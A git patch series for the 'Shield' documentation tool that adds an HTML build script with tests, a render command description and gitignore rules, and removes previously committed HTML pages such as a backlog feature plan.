index 00000000..b85fb333
--- /dev/null
+++ b/shield/scripts/test_rerender_all.py
@@ -0,0 +1,41 @@
+"""Eval for rerender_all.py — renders the COMPLETE committed HTML set,
+including enhanced-* and detailed/* review docs (regression: those were skipped)."""
+from __future__ import annotations
+
+import importlib.util
+import json
+import subprocess
+from pathlib import Path
+
+SPEC = Path(__file__).resolve().parent / "rerender_all.py"
+_spec = importlib.util.spec_from_file_location("rerender_all", SPEC)
+ra = importlib.util.module_from_spec(_spec)
+_spec.loader.exec_module(ra)
+
+
+def _fixture(root: Path) -> None:
+    """A feature with a main doc + a plan review that has summary, enhanced, detailed."""
+    feat = root / "feat-x"
+    (feat).mkdir(parents=True)
+    (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []}))
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+    rev = feat / "reviews" / "plan" / "2026-06-08"
+    (rev / "detailed").mkdir(parents=True)
+    (rev / "summary.md").write_text("# Summary\n\nbody\n")
+    (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n")
+    (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n")
+
+
+def test_renders_enhanced_and_detailed(tmp_path):
+    _fixture(tmp_path)
+    rc = ra.rerender_all(tmp_path)
+    assert rc == 0
+    out = tmp_path / "feat-x" / "outputs"
+    expected = [
+        out / "prd.html",
+        out / "reviews" / "plan" / "2026-06-08" / "summary.html",
+        out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html",
+        out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html",
+    ]
+    for p in expected:
+        assert p.is_file(), f"missing rendered page: {p}"

From 8a8dc6534e11d9466ac8d72b593fe3ea897cecbf Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:25:40 +0000
Subject: [PATCH 04/10] =?UTF-8?q?feat(shield):=20render-output.sh=20?=
 =?UTF-8?q?=E2=80=94=20one=20build=20script=20for=20the=20HTML=20site?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
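
Note (not part of the commit message): the output-directory handling in
render-output.sh can be summarized by the Python sketch below. It is only an
illustration of the shell logic in this patch; `resolve_output_dir` and
`precheck_exit_code` are hypothetical names that do not exist in the repo, and
the script itself stays bash.

```python
from __future__ import annotations

import subprocess
from pathlib import Path


def resolve_output_dir(arg: str = "", cwd: Path | None = None) -> Path:
    """Hypothetical mirror of the script's OUTPUT_DIR resolution."""
    if arg:
        # An explicit, non-empty argument always wins.
        return Path(arg)
    cwd = cwd or Path.cwd()
    try:
        res = subprocess.run(
            ["git", "rev-parse", "--show-toplevel"],
            cwd=cwd, capture_output=True, text=True, check=False,
        )
        top = res.stdout.strip() if res.returncode == 0 else ""
    except OSError:
        # git is not installed: the shell version also falls back to pwd.
        top = ""
    root = Path(top) if top else cwd
    return root / "docs" / "shield"


def precheck_exit_code(output_dir: Path) -> int:
    """Return 2 when the target is not a directory (the script's error path).

    0 only means the check passed and the two build steps would run next.
    """
    return 0 if output_dir.is_dir() else 2
```

An empty argument and a missing argument behave the same way, which is what
lets the /shield render command pass its argument string through unchanged.
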
 shield/scripts/render-output.sh      | 30 ++++++++++++++++++++++++
 shield/scripts/test_render_output.py | 34 ++++++++++++++++++++++++++++
 2 files changed, 64 insertions(+)
 create mode 100755 shield/scripts/render-output.sh
 create mode 100644 shield/scripts/test_render_output.py

diff --git a/shield/scripts/render-output.sh b/shield/scripts/render-output.sh
new file mode 100755
index 00000000..fd4d0ae5
--- /dev/null
+++ b/shield/scripts/render-output.sh
@@ -0,0 +1,30 @@
+#!/usr/bin/env bash
+# Build the full Shield HTML site from committed Markdown.
+#
+# Step 1: render every source .md to its outputs/*.html (rerender_all.py)
+# Step 2: write the dashboard + shared assets (write_shield_assets.py)
+#
+# HTML is a build artifact: it is gitignored and regenerated on demand.
+# Markdown + JSON sidecars are the committed source of truth.
+#
+# Usage:
+#   render-output.sh [OUTPUT_DIR]
+#     OUTPUT_DIR defaults to <repo-root>/docs/shield
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+OUTPUT_DIR="${1:-}"
+if [[ -z "$OUTPUT_DIR" ]]; then
+  ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+  OUTPUT_DIR="$ROOT/docs/shield"
+fi
+
+if [[ ! -d "$OUTPUT_DIR" ]]; then
+  echo "render-output: not a dir: $OUTPUT_DIR" >&2
+  exit 2
+fi
+
+python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR"
+python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR"
+echo "render-output: site built at $OUTPUT_DIR"
diff --git a/shield/scripts/test_render_output.py b/shield/scripts/test_render_output.py
new file mode 100644
index 00000000..a62b4344
--- /dev/null
+++ b/shield/scripts/test_render_output.py
@@ -0,0 +1,34 @@
+"""Eval for render-output.sh — the full build: pages + dashboard assets."""
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+
+SCRIPT = Path(__file__).resolve().parent / "render-output.sh"
+
+
+def test_build_produces_pages_and_assets(tmp_path):
+    feat = tmp_path / "feat-x"
+    feat.mkdir(parents=True)
+    (tmp_path / "manifest.json").write_text(
+        json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]})
+    )
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+
+    res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True)
+    assert res.returncode == 0, res.stderr
+
+    # pages
+    assert (feat / "outputs" / "prd.html").is_file()
+    # dashboard + shared assets
+    for asset in ["manifest.js", "index.html", "shield.css",
+                  "shield-nav.js", "shield-dashboard.js"]:
+        assert (tmp_path / asset).is_file(), f"missing asset {asset}"
+
+
+def test_missing_dir_errors(tmp_path):
+    res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")],
+                         capture_output=True, text=True)
+    assert res.returncode == 2
+    assert "not a dir" in res.stderr

From af977e135117e7d160e1518be33bad164b0a9a61 Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:26:05 +0000
Subject: [PATCH 05/10] feat(shield): /shield render command triggers
 render-output.sh

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
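
Note (not part of the commit message): step 1 of the command renders every
source `.md` to its `outputs/*.html`. The sketch below shows that path mapping
as it appears in the test fixtures of this series (`feat-x/prd.md` becomes
`feat-x/outputs/prd.html`). `output_path_for` is a hypothetical helper written
for illustration; the real mapping lives in rerender_all.py and may handle
cases this sketch does not.

```python
from pathlib import Path


def output_path_for(root: Path, source_md: Path) -> Path:
    """Map <root>/<feature>/<rel>.md to <root>/<feature>/outputs/<rel>.html.

    Assumption: the first path component under root is the feature folder.
    """
    rel = source_md.relative_to(root)
    feature, *rest = rel.parts
    if not rest:
        raise ValueError(f"expected <feature>/<doc>.md under {root}, got {rel}")
    return (root / feature / "outputs").joinpath(*rest).with_suffix(".html")
```

Review documents keep their sub-path under `outputs/`, so a file at
`reviews/plan/<date>/detailed/agile-coach.md` lands at
`outputs/reviews/plan/<date>/detailed/agile-coach.html`.
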
 shield/commands/render.md | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 shield/commands/render.md

diff --git a/shield/commands/render.md b/shield/commands/render.md
new file mode 100644
index 00000000..9b4800cd
--- /dev/null
+++ b/shield/commands/render.md
@@ -0,0 +1,37 @@
+---
+name: render
+description: Build the browsable Shield HTML site locally from committed Markdown
+args: "[output dir — optional, defaults to docs/shield]"
+---
+
+# Render Shield Output
+
+Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the
+browsable dashboard) is a **local build artifact** — gitignored and regenerated
+on demand. Run this command to (re)build the site, then open the HTML locally.
+
+## Usage
+
+- `/shield render`: rebuild the whole site under `docs/shield/`
+- `/shield render <output dir>`: rebuild a site rooted at a custom dir
+
+## Behavior
+
+1. Run the build script, which renders every source `.md` to its
+   `outputs/*.html`, then writes the dashboard (`index.html`) and shared assets
+   (`manifest.js`, `shield.css`, `shield-nav.js`, `shield-dashboard.js`):
+
+   ```bash
+   "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS"
+   ```
+
+   (When `$ARGUMENTS` is empty, the script defaults to `<repo-root>/docs/shield`.)
+
+2. Report the built site path and remind the user the output is gitignored —
+   open `docs/shield/index.html` in a browser to view.
+
+## Important
+
+- This command does NOT author or modify any Markdown — it only renders.
+- HTML is never committed; do not `git add` anything under `outputs/` or the
+  generated root assets.

From 9f71371585e5ac1910ed711506ebe6352e18196a Mon Sep 17 00:00:00 2001
From: ashwinimanoj <ashwinimanoj@gmail.com>
Date: Mon, 8 Jun 2026 08:27:16 +0000
Subject: [PATCH 06/10] build(shield): gitignore HTML build artifacts; untrack
 committed HTML

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
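
Note (not part of the commit message): the sketch below approximates which
paths the new .gitignore entries cover. It is not a gitignore implementation
and does not call git; `is_build_artifact` and `ROOT_ASSETS` are hypothetical
names used only to make the intent of the patterns concrete.

```python
from pathlib import PurePosixPath

# Generated files that sit directly under docs/shield/.
ROOT_ASSETS = {
    "index.html",
    "manifest.js",
    "shield.css",
    "shield-nav.js",
    "shield-dashboard.js",
}


def is_build_artifact(path: str) -> bool:
    """Approximate the ignore rules added for docs/shield (illustration only)."""
    parts = PurePosixPath(path).parts
    for i in range(len(parts) - 1):
        if parts[i:i + 2] != ("docs", "shield"):
            continue
        rest = parts[i + 2:]
        # docs/shield/<asset>
        if len(rest) == 1 and rest[0] in ROOT_ASSETS:
            return True
        # docs/shield/<feature>/outputs/<anything below>
        if len(rest) >= 3 and rest[1] == "outputs":
            return True
    return False
```

Ignore rules only affect untracked paths, which is why this commit also removes
the already-tracked HTML and assets from the index rather than relying on
.gitignore alone.
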
 .gitignore                                    |  11 +
 .../shield/backlog-20260527/outputs/plan.html | 221 -----
 docs/shield/backlog-20260527/outputs/prd.html | 392 --------
 .../plan/2026-05-27/detailed/agile-coach.html | 308 -------
 .../2026-05-27/detailed/backend-engineer.html | 113 ---
 .../plan/2026-05-27/detailed/dx-engineer.html | 172 ----
 .../2026-05-27/detailed/product-manager.html  | 196 ----
 .../detailed/security-engineer.html           | 176 ----
 .../reviews/plan/2026-05-27/detailed/sre.html | 129 ---
 .../plan/2026-05-27/enhanced-plan.html        | 274 ------
 .../reviews/plan/2026-05-27/summary.html      | 235 -----
 .../plan/2026-05-29/detailed/agile-coach.html | 133 ---
 .../2026-05-29/detailed/backend-engineer.html |  99 ---
 .../plan/2026-05-29/detailed/dx-engineer.html | 159 ----
 .../2026-05-29/detailed/product-manager.html  | 109 ---
 .../detailed/security-engineer.html           | 170 ----
 .../reviews/plan/2026-05-29/detailed/sre.html | 145 ---
 .../plan/2026-05-29/enhanced-plan.html        | 207 -----
 .../reviews/plan/2026-05-29/summary.html      | 206 -----
 .../reviews/prd/2026-05-27/enhanced-prd.html  | 316 -------
 .../reviews/prd/2026-05-27/summary.html       | 241 -----
 .../prd/2026-05-27_2/enhanced-prd.html        | 364 --------
 .../reviews/prd/2026-05-27_2/summary.html     | 203 -----
 docs/shield/backlog-20260527/outputs/trd.html | 531 -----------
 .../outputs/research.html                     | 324 -------
 docs/shield/index.html                        |  33 -
 docs/shield/manifest.js                       | 161 ----
 .../outputs/plan-architecture.html            | 162 ----
 .../outputs/plan.html                         | 430 ---------
 .../outputs/research.html                     | 837 ------------------
 .../plan/2026-05-25/detailed/agile-coach.html | 165 ----
 .../plan/2026-05-25/detailed/architect.html   | 149 ----
 .../2026-05-25/detailed/backend-engineer.html | 165 ----
 .../plan/2026-05-25/detailed/dx-engineer.html | 216 -----
 .../reviews/plan/2026-05-25/detailed/sre.html | 148 ----
 .../plan/2026-05-25/enhanced-plan.html        | 396 ---------
 .../reviews/plan/2026-05-25/summary.html      | 411 ---------
 docs/shield/shield-dashboard.js               |  62 --
 docs/shield/shield-nav.js                     | 160 ----
 docs/shield/shield.css                        |  81 --
 .../scripts/test_gitignore_html_artifacts.py  |  29 +
 41 files changed, 40 insertions(+), 8999 deletions(-)
 delete mode 100644 docs/shield/backlog-20260527/outputs/plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html
 delete mode 100644 docs/shield/backlog-20260527/outputs/trd.html
 delete mode 100644 docs/shield/devcontainer-implement-20260518/outputs/research.html
 delete mode 100644 docs/shield/index.html
 delete mode 100644 docs/shield/manifest.js
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/research.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html
 delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html
 delete mode 100644 docs/shield/shield-dashboard.js
 delete mode 100644 docs/shield/shield-nav.js
 delete mode 100644 docs/shield/shield.css
 create mode 100644 shield/scripts/test_gitignore_html_artifacts.py

diff --git a/.gitignore b/.gitignore
index b091540e..c8a5a65a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -41,3 +41,14 @@ shield/tests/output/
 # outputs/, and reviews/ (see docs/superpowers/plans/2026-05-22-shield-output-
 # structure-cutover.md). Only the hidden Q&A scratch transcript is disposable.
 **/docs/shield/*/.session-transcript.md
+
+# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are
+# the committed source of truth. Regenerate the site locally with /shield
+# render (shield/scripts/render-output.sh). See docs/superpowers/specs/
+# 2026-06-08-shield-single-canonical-output-design.md
+**/docs/shield/*/outputs/
+**/docs/shield/index.html
+**/docs/shield/manifest.js
+**/docs/shield/shield.css
+**/docs/shield/shield-nav.js
+**/docs/shield/shield-dashboard.js
diff --git a/docs/shield/backlog-20260527/outputs/plan.html b/docs/shield/backlog-20260527/outputs/plan.html
deleted file mode 100644
index 57e67c4b..00000000
--- a/docs/shield/backlog-20260527/outputs/plan.html
+++ /dev/null
@@ -1,221 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Plan — backlog-20260527</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#milestones">Milestones</a>
-</li>
-<li><a href="#epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  (M1)</a>
-<ul>
-<li><a href="#epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator (high)</a></li>
-<li><a href="#epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)</a></li>
-<li><a href="#epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list (high)</a></li>
-<li><a href="#epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog (medium)</a></li>
-</ul>
-</li>
-<li><a href="#epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</a>
-<ul>
-<li><a href="#epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)</a></li>
-<li><a href="#epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)</a></li>
-</ul>
-</li>
-<li><a href="#epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  (M3)</a>
-<ul>
-<li><a href="#epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference (high)</a></li>
-<li><a href="#epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)</a></li>
-<li><a href="#epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)</a></li>
-</ul>
-</li>
-<li><a href="#epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  (M3)</a>
-<ul>
-<li><a href="#epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)</a></li>
-<li><a href="#epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs (medium)</a></li>
-</ul>
-</li>
-<li><a href="#validate-the-bet-from-v1-data--p1--pm10-decided-2026-05-27">Validate the bet from v1 data  (P1 — PM10, decided 2026-05-27)</a>
-</li>
-<li><a href="#carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<!-- sidecar: ./plan.json -->
-<h1 id="plan--shield-backlog">Plan — Shield Backlog</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="../prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.12) · <strong>TRD:</strong> <a href="../trd.md"><code>./trd.md</code></a> · <strong>Sidecar:</strong> <code>./plan.json</code></p>
-<p>A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted <code>/plan</code> or <code>/implement</code> run, lazily on the <code>/backlog</code> view sweep, or manually. Matching is by feature (<code>manifest.json</code> index) + epic (<code>plan.json</code> gate); no ids are stamped. This re-plan folds the 2026-05-27 plan-review findings (P0 gate-0d, the P1/P2 set) into the stories and adds the previously-deferred 14-section TRD plus three component LLD drafts.</p>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Touches LLD</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog-store</code></td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic, validate-or-refuse); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td><code>epic-suggester</code></td>
-<td>Every entry carries feature + epic (existing or proposed-new); agent suggests via exact-normalized match; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td><code>reconciler</code></td>
-<td>Promotion via transient reference; reconciliation engine (single &quot;epic landed&quot; predicate matching by epic <strong>name</strong>, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. <code>shield.schema.json</code> <code>backlog</code> key); eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<p>LLD drafts emitted by this plan (feature-folder, net-new): <a href="../lld-backlog-store.md"><code>lld-backlog-store.md</code></a>, <a href="../lld-epic-suggester.md"><code>lld-epic-suggester.md</code></a>, <a href="../lld-reconciler.md"><code>lld-reconciler.md</code></a>.</p>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>. <code>schema_version</code> is set now so future shape changes migrate read-old/write-new.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; specify the <code>id</code> contract (<code>uuid4</code> string; uniqueness across <code>entries[]</code> enforced by the <strong>validator</strong>, not the JSON Schema — P1-2 — since draft 2020-12 can't express property-level array uniqueness); document entry shape, migration policy, and the <strong><code>manifest features[].name</code> == folder-slug</strong> invariant (P1-3) in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>; migration is doc-only until <code>schema_version</code> 2.</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code> (named error); <strong>the validator</strong> rejects duplicate <code>id</code> values (<code>duplicate_entry_id</code>); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy + name==slug invariant documented; enums constrained; <code>id</code> is a <code>uuid4</code> string.</li>
-<li><strong>Design:</strong> <a href="../trd.md#apis-involved">§11 APIs Involved</a> · LLD <a href="../lld-backlog-store.md#data-model"><code>backlog-store</code> §4 Data model</a></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented <code>capture()</code> write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. <em>Resolves PRD-review P1 (capture interface); closes TRD §12 Q3.</em></p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code> + <code>uuid4</code> id); <strong>LOCKED</strong> write-helper signature <code>capture(text: str, *, kind: str = &quot;task&quot;, feature: str | None = None, epic: str | None = None, source: str) -&gt; str</code> in <code>shield/scripts/backlog_store.py</code>, raising <code>BacklogInvalid</code> (pinned TRD §11); <strong>LOCKED</strong> single-writer (no lock) → full doc → <code>.tmp</code> → <code>os.replace()</code> (TRD §6 N1); <strong>+ compare-before-replace</strong> (P1-1/security): refuse <code>os.replace()</code> if the on-disk store changed since read → loud <code>BacklogInvalid</code>, no lost entry; <strong>package <code>backlog_store</code></strong> with a <code>pyproject.toml</code> (P1-4 — skills import <code>capture()</code>); validate-or-refuse on read <strong>and</strong> write.</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; <strong>a concurrent on-disk change between read and replace is refused with <code>BacklogInvalid</code> (no lost entry)</strong>; next <code>order</code>/<code>uuid4</code> id/default <code>kind</code> assigned; malformed/partial <code>backlog.json</code> on read is <strong>refused with <code>BacklogInvalid</code></strong>, never silently read or truncated.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted by <code>order</code>; define the per-entry render-line format once in the SKILL.md (canonical badge string lives in EPIC-2-S1) so every view path renders identically; document a local-dev/dry-run loop; empty-backlog message.</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered; render-line format documented once and reused.</li>
-<li><strong>Design:</strong> <a href="../trd.md#product-journey">§4 Product Journey</a></li>
-</ul>
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete for ideas decided against / entries no run will clear.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (git revert covers only committed entries; uncommitted manual remove is unrecoverable by design — N4).</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained; uncommitted-entry recoverability caveat documented.</li>
-<li><strong>Design:</strong> <a href="../trd.md#functional-requirements">§5 Functional Requirements</a> · LLD <a href="../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</h2>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<p><code>/backlog</code> view shows each entry's feature pipeline status (research/prd/plan) read live from <code>manifest.json</code> — so &quot;prd done, not yet planned&quot; is visible without removal.</p>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges per entry; pin the canonical badge string <code>research ✓  prd ✓  plan –</code> in the SKILL.md; <code>not started</code> when feature absent; compute at view time (no stored status).</li>
-<li><strong>AC:</strong> badges derived from manifest using the pinned string; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> <a href="../trd.md#high-level-design">§7 High-Level Design</a></li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<p>Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.</p>
-<ul>
